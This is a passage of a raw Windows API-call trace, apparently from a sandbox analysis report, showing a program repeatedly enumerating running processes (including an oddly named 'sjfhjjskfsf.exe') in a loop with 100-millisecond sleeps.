th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.987] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.987] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.987] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.988] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.988] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.988] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.988] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.989] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.989] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.989] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.989] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.990] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.990] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.990] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.991] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.991] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.991] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.991] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.992] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.992] Sleep (dwMilliseconds=0x64) [0225.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a4 [0225.092] Process32FirstW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.093] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.093] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.093] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.094] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.094] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.094] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.094] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.095] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.095] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.095] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.096] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.096] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.096] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.096] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.097] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.097] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.097] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.097] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.098] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.098] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.098] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.099] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.099] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0225.099] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0225.099] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0225.100] Process32NextW (in: hSnapshot=0x2a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0225.100] Sleep (dwMilliseconds=0x64) [0225.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a8 [0225.204] Process32FirstW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.204] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.205] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.205] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.205] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.206] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.206] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.206] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.206] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.207] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.207] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.207] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.208] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.208] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.208] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.208] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.209] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.209] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.209] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.210] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.210] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.210] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.210] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.211] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0225.211] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0225.211] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0225.212] Process32NextW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0225.212] Sleep (dwMilliseconds=0x64) [0225.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ac [0225.311] Process32FirstW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.312] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.312] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.312] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.312] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.313] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.313] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.313] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 